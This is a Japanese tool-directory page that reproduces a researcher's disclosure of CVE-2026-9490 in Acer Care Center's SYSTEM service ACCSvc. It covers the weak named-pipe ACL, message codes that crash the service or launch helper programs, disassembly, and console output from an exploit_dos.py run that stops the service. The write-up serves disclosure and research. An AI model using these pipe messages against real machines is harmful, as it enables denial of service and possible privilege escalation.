Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-9490 — ACCSvcサービスは、弱いセキュリティ記述子を持つ名前付きパイプを作成し、認証されたユーザーなら誰でも接続してメッセージを送信できるようにします。特別に細工されたメッセージ(メッセージタイプ0x03)がパイプに送信されると、サービスは終了コード1067(ERROR_PROCESS_ABORTED)でクラッシュします。 | Kitploit
ツール/GitHubGitHub/ugvxb/cve-2026-9490
特権昇格脆弱性分析エクスプロイトリバースエンジニアリングペネトレーションテストバイナリ解析
GitHubugvxb/cve-2026-9490

CVE-2026-9490

ACCSvcサービスは、弱いセキュリティ記述子を持つ名前付きパイプを作成し、認証されたユーザーなら誰でも接続してメッセージを送信できるようにします。特別に細工されたメッセージ(メッセージタイプ0x03)がパイプに送信されると、サービスは終了コード1067(ERROR_PROCESS_ABORTED)でクラッシュします。

リポジトリを見る
43ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE ID: CVE-2026-9490
研究者: Vo Duc Thang (ugvxb)
謝辞: https://community.acer.com/en/kb/articles/19668

1. 概要

Acer Care Center サービス (ACCSvc.exe) に重大なセキュリティ脆弱性が特定されました。この脆弱性により、認証された任意のローカルユーザーがシステムサービスをクラッシュさせ (サービス拒否)、さらに弱いセキュリティ設定の名前付きパイプインターフェースを通じて特権を昇格させる可能性があります。

SYSTEM 権限 (LocalSystem) で実行されるこのサービスは、すべての認証済みユーザーに読み取り、書き込み、実行のアクセス許可を付与する、過度に緩いアクセス制御を持つ名前付きパイプを公開しています。


2. 脆弱性の詳細

2.1 影響を受けるコンポーネント

属性値
製品Acer Care Center
コンポーネントACCSvc.exe (ACC サービス)
サービス名ACCSvc
インストールパスC:\Program Files (x86)\Acer\Care Center\
サービスアカウントLocalSystem (NT AUTHORITY\SYSTEM)
開始の種類AUTO_START
名前付きパイプ\.\pipe\treadstone_service_LightMode

2.2 脆弱性 #1: サービス拒否

説明

ACCSvc サービスは、認証された任意のユーザーが接続してメッセージを送信できるようにする、弱いセキュリティ記述子を持つ名前付きパイプを作成します。特別に細工されたメッセージ (メッセージタイプ 0x03) がパイプに送信されると、サービスは終了コード 1067 (ERROR_PROCESS_ABORTED) でクラッシュします。

セキュリティ記述子 (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

SDDL 分析

影響

特別な権限を持たない標準ユーザーが ACCSvc システムサービスを終了させ、Acer Care Center の機能を利用不能にすることができます。

2.3 脆弱性 #2: ローカル権限昇格の可能性

説明

同じ弱い名前付きパイプ ACL により、認証済みユーザーは CreateProcessAsUserW を介してサービスがランチャーアプリケーションを実行するきっかけとなるコマンドメッセージを送信できます。

コマンドコード

コマンド16進値ターゲット実行ファイル
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. 技術的分析

3.1 バイナリ分析

属性値
ファイルACCSvc.exe
タイプPE32+ executable (console) x86-64
解析ツールRadare2
エントリポイント

3.2 特定された主要関数

3.3 名前付きパイプ作成パラメータ

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 コマンドディスパッチロジック

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. エクスプロイト結果

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

結果: 標準ユーザーが SYSTEM サービスのクラッシュに成功しました。


5. リスク評価

5.1 CVSS v4.0 スコア

メトリクス値
CVSS 4.0 ベクターAV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
CVSS ベーススコア6.8 (中)

5.2 CWE 分類

CWE ID名前
CWE-269不適切な特権管理

6. 免責事項

この PoC は、教育的および許可されたセキュリティ研究のみを目的としています。著者は、いかなる誤用に対しても責任を負いません。許可なく行うエクスプロイトは違法です。

ツールをダウンロード
ACEプリンシパルアクセス許可評価
(D;OICI;GA;;;BG)組み込みの Guestsすべて拒否安全
(D;OICI;GA;;;AN)匿名すべて拒否安全
(A;OICI;GRGWGX;;;AU)認証済みユーザー読み取り/書き込み/実行脆弱
(A;OICI;GA;;;BA)組み込みの Administratorsすべて許可想定どおり
0x14000fd4c
関数アドレス目的
fcn.140009a700x140009a70CreateNamedPipeW - 脆弱なパイプを作成
fcn.1400075700x140007570CreateProcessAsUserW - プロセスを生成
fcn.14000a8a00x14000a8a0ReadFile ハンドラー
fcn.1400099500x140009950WriteFile ハンドラー
fcn.1400080500x140008050メッセージディスパッチャー